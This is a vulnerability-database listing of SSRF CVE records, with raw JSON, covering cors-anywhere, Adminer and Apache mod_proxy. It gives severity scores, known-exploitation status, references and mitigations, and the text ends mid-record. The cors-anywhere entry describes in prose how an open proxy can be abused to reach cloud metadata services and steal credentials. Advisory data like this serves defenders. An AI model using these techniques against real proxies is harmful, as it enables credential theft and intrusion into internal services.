CWE-918
Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
CVE-2020-36851 (GCVE-0-2020-36851)
Vulnerability from cvelistv5
Published
2025-09-25 14:45
Modified
2025-09-26 00:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
Rob -- W / cors-anywhere instances configured as an open proxy allow unauthenticated external users to induce the server to make HTTP requests to arbitrary targets (SSRF). Because the proxy forwards requests and headers, an attacker can reach internal-only endpoints and link-local metadata services, retrieve instance role credentials or other sensitive metadata, and interact with internal APIs and services that are not intended to be internet-facing. The vulnerability is exploitable by sending crafted requests to the proxy with the target resource encoded in the URL; many cors-anywhere deployments forward arbitrary methods and headers (including PUT), which can permit exploitation of IMDSv2 workflows as well as access to internal management APIs. Successful exploitation can result in theft of cloud credentials, unauthorized access to internal services, remote code execution or privilege escalation (depending on reachable backends), data exfiltration, and full compromise of cloud resources. Mitigation includes: restricting the proxy to trusted origins or authentication, whitelisting allowed target hosts, preventing access to link-local and internal IP ranges, removing support for unsafe HTTP methods/headers, enabling cloud provider mitigations, and deploying network-level protections.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/Rob--W/cors-anywhere/issues/152 | issue-tracking | |
| https://github.com/Rob--W/cors-anywhere/issues/78 | issue-tracking | |
| https://www.certik.com/resources/blog/cors-anywhere-dangers-of-misconfigured-third-party-software | technical-description | |
| https://www.vulncheck.com/advisories/rob-w-cors-anywhere-misconfigured-cors-proxy-allows-ssrf | third-party-advisory | |
| https://github.com/SocketDev/security-research/security/advisories/GHSA-9wmg-93pw-fc3g | third-party-advisory | |
| https://github.com/Rob--W/cors-anywhere/issues/521 | issue-tracking |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Rob--W / cors-anywhere | Rob--W / cors-anywhere |
Version: * ≤ 0.4.4 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-36851",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-25T15:44:47.320455Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-25T15:48:32.729Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"modules": [
"Proxy forwarding / request forwarding component"
],
"product": "Rob--W / cors-anywhere",
"repo": "https://github.com/Rob--W/cors-anywhere",
"vendor": "Rob--W / cors-anywhere",
"versions": [
{
"lessThanOrEqual": "0.4.4",
"status": "affected",
"version": "*",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "CertiK\u0027s Pentesting Team"
},
{
"lang": "en",
"type": "reporter",
"value": "Jonathan Leitschuh"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eRob -- W / cors-anywhere instances configured as an open proxy allow unauthenticated external users to induce the server to make HTTP requests to arbitrary targets (SSRF). Because the proxy forwards requests and headers, an attacker can reach internal-only endpoints and link-local metadata services, retrieve instance role credentials or other sensitive metadata, and interact with internal APIs and services that are not intended to be internet-facing. The vulnerability is exploitable by sending crafted requests to the proxy with the target resource encoded in the URL; many cors-anywhere deployments forward arbitrary methods and headers (including PUT), which can permit exploitation of IMDSv2 workflows as well as access to internal management APIs. Successful exploitation can result in theft of cloud credentials, unauthorized access to internal services, remote code execution or privilege escalation (depending on reachable backends), data exfiltration, and full compromise of cloud resources. Mitigation includes: restricting the proxy to trusted origins or authentication, whitelisting allowed target hosts, preventing access to link-local and internal IP ranges, removing support for unsafe HTTP methods/headers, enabling cloud provider mitigations, and deploying network-level protections.\u003c/p\u003e"
}
],
"value": "Rob -- W / cors-anywhere instances configured as an open proxy allow unauthenticated external users to induce the server to make HTTP requests to arbitrary targets (SSRF). Because the proxy forwards requests and headers, an attacker can reach internal-only endpoints and link-local metadata services, retrieve instance role credentials or other sensitive metadata, and interact with internal APIs and services that are not intended to be internet-facing. The vulnerability is exploitable by sending crafted requests to the proxy with the target resource encoded in the URL; many cors-anywhere deployments forward arbitrary methods and headers (including PUT), which can permit exploitation of IMDSv2 workflows as well as access to internal management APIs. Successful exploitation can result in theft of cloud credentials, unauthorized access to internal services, remote code execution or privilege escalation (depending on reachable backends), data exfiltration, and full compromise of cloud resources. Mitigation includes: restricting the proxy to trusted origins or authentication, whitelisting allowed target hosts, preventing access to link-local and internal IP ranges, removing support for unsafe HTTP methods/headers, enabling cloud provider mitigations, and deploying network-level protections."
}
],
"impacts": [
{
"capecId": "CAPEC-664",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-664 Server Side Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 9.5,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-942",
"description": "CWE-942 Permissive Cross-domain Policy with Untrusted Domains",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T00:54:59.828Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/Rob--W/cors-anywhere/issues/152"
},
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/Rob--W/cors-anywhere/issues/78"
},
{
"tags": [
"technical-description"
],
"url": "https://www.certik.com/resources/blog/cors-anywhere-dangers-of-misconfigured-third-party-software"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/rob-w-cors-anywhere-misconfigured-cors-proxy-allows-ssrf"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://github.com/SocketDev/security-research/security/advisories/GHSA-9wmg-93pw-fc3g"
},
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/Rob--W/cors-anywhere/issues/521"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Rob--W / cors-anywhere Misconfigured CORS Proxy Allows SSRF",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Mitigation includes: restricting the proxy to trusted origins or authentication, whitelisting allowed target hosts, preventing access to link-local and internal IP ranges, removing support for unsafe HTTP methods/headers, enabling cloud provider mitigations, and deploying network-level protections.\u003cbr\u003e"
}
],
"value": "Mitigation includes: restricting the proxy to trusted origins or authentication, whitelisting allowed target hosts, preventing access to link-local and internal IP ranges, removing support for unsafe HTTP methods/headers, enabling cloud provider mitigations, and deploying network-level protections."
}
],
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2020-36851",
"datePublished": "2025-09-25T14:45:38.599Z",
"dateReserved": "2025-09-25T13:38:54.393Z",
"dateUpdated": "2025-09-26T00:54:59.828Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-21311 (GCVE-0-2021-21311)
Vulnerability from cvelistv5
Published
2021-02-11 20:55
Modified
2025-09-29 22:20
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 | x_refsource_CONFIRM | |
| https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf | x_refsource_MISC | |
| https://packagist.org/packages/vrana/adminer | x_refsource_MISC | |
| https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 | x_refsource_MISC | |
| https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html | mailing-list, x_refsource_MLIST |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T18:09:15.132Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packagist.org/packages/vrana/adminer"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351"
},
{
"name": "[debian-lts-announce] 20210302 [SECURITY] [DLA 2580-1] adminer security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-21311",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-27T03:55:28.265761Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-09-29",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21311"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T22:20:25.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"timeline": [
{
"lang": "en",
"time": "2025-09-29T00:00:00+00:00",
"value": "CVE-2021-21311 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "adminer",
"vendor": "vrana",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.0.0, \u003c 4.7.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-03-02T21:06:28.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packagist.org/packages/vrana/adminer"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351"
},
{
"name": "[debian-lts-announce] 20210302 [SECURITY] [DLA 2580-1] adminer security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html"
}
],
"source": {
"advisory": "GHSA-x5r2-hj5c-8jx6",
"discovery": "UNKNOWN"
},
"title": "SSRF in adminer",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-21311",
"STATE": "PUBLIC",
"TITLE": "SSRF in adminer"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "adminer",
"version": {
"version_data": [
{
"version_value": "\u003e= 4.0.0, \u003c 4.7.9"
}
]
}
}
]
},
"vendor_name": "vrana"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918: Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6",
"refsource": "CONFIRM",
"url": "https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6"
},
{
"name": "https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf",
"refsource": "MISC",
"url": "https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf"
},
{
"name": "https://packagist.org/packages/vrana/adminer",
"refsource": "MISC",
"url": "https://packagist.org/packages/vrana/adminer"
},
{
"name": "https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351",
"refsource": "MISC",
"url": "https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351"
},
{
"name": "[debian-lts-announce] 20210302 [SECURITY] [DLA 2580-1] adminer security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html"
}
]
},
"source": {
"advisory": "GHSA-x5r2-hj5c-8jx6",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-21311",
"datePublished": "2021-02-11T20:55:15.000Z",
"dateReserved": "2020-12-22T00:00:00.000Z",
"dateUpdated": "2025-09-29T22:20:25.376Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-40438 (GCVE-0-2021-40438)
Vulnerability from cvelistv5
Published
2021-09-16 14:40
Modified
2025-07-30 01:37
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server Side Request Forgery (SSRF)
Summary
A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache HTTP Server |
Version: Apache HTTP Server 2.4 < |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:44:10.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"name": "FEDORA-2021-dce7e7738e",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD/"
},
{
"name": "[httpd-users] 20210923 [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 Re: [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 Re: [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "FEDORA-2021-e3f6dd670d",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R/"
},
{
"name": "[debian-lts-announce] 20211002 [SECURITY] [DLA 2776-1] apache2 security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00001.html"
},
{
"name": "[httpd-bugs] 20211008 [Bug 65616] CVE-2021-36160 regression",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37%40%3Cbugs.httpd.apache.org%3E"
},
{
"name": "DSA-4982",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-4982"
},
{
"name": "[httpd-users] 20211019 [users@httpd] Regarding CVE-2021-40438",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20211019 Re: [users@httpd] Regarding CVE-2021-40438",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "20211124 Multiple Vulnerabilities in Apache HTTP Server Affecting Cisco Products: November 2021",
"tags": [
"vendor-advisory",
"x_refsource_CISCO",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-2.4.49-VWL69sWQ"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.tenable.com/security/tns-2021-17"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20211008-0004/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf"
},
{
"name": "GLSA-202208-20",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202208-20"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2021-40438",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-06T21:08:29.032806Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2021-12-01",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40438"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-30T01:37:58.543Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"timeline": [
{
"lang": "en",
"time": "2021-12-01T00:00:00+00:00",
"value": "CVE-2021-40438 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Apache HTTP Server",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "2.4.48",
"status": "affected",
"version": "Apache HTTP Server 2.4",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "The issue was discovered by the Apache HTTP security team while analysing CVE-2021-36160"
}
],
"descriptions": [
{
"lang": "en",
"value": "A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier."
}
],
"metrics": [
{
"other": {
"content": {
"other": "high"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-08-14T01:07:57.000Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"name": "FEDORA-2021-dce7e7738e",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD/"
},
{
"name": "[httpd-users] 20210923 [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 Re: [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 Re: [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "FEDORA-2021-e3f6dd670d",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R/"
},
{
"name": "[debian-lts-announce] 20211002 [SECURITY] [DLA 2776-1] apache2 security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00001.html"
},
{
"name": "[httpd-bugs] 20211008 [Bug 65616] CVE-2021-36160 regression",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37%40%3Cbugs.httpd.apache.org%3E"
},
{
"name": "DSA-4982",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2021/dsa-4982"
},
{
"name": "[httpd-users] 20211019 [users@httpd] Regarding CVE-2021-40438",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20211019 Re: [users@httpd] Regarding CVE-2021-40438",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00%40%3Cusers.httpd.apache.org%3E"
},
{
"name": "20211124 Multiple Vulnerabilities in Apache HTTP Server Affecting Cisco Products: November 2021",
"tags": [
"vendor-advisory",
"x_refsource_CISCO"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-2.4.49-VWL69sWQ"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.tenable.com/security/tns-2021-17"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20211008-0004/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf"
},
{
"name": "GLSA-202208-20",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "https://security.gentoo.org/glsa/202208-20"
}
],
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2021-09-16T00:00:00",
"value": "2.4.49 released"
}
],
"title": "mod_proxy SSRF",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-40438",
"STATE": "PUBLIC",
"TITLE": "mod_proxy SSRF"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache HTTP Server",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "Apache HTTP Server 2.4",
"version_value": "2.4.48"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "The issue was discovered by the Apache HTTP security team while analysing CVE-2021-36160"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "high"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918 Server Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://httpd.apache.org/security/vulnerabilities_24.html",
"refsource": "MISC",
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"name": "FEDORA-2021-dce7e7738e",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD/"
},
{
"name": "[httpd-users] 20210923 [users@httpd] 2.4.49 security fixes: more info",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697@%3Cusers.httpd.apache.org%3E"
},
{
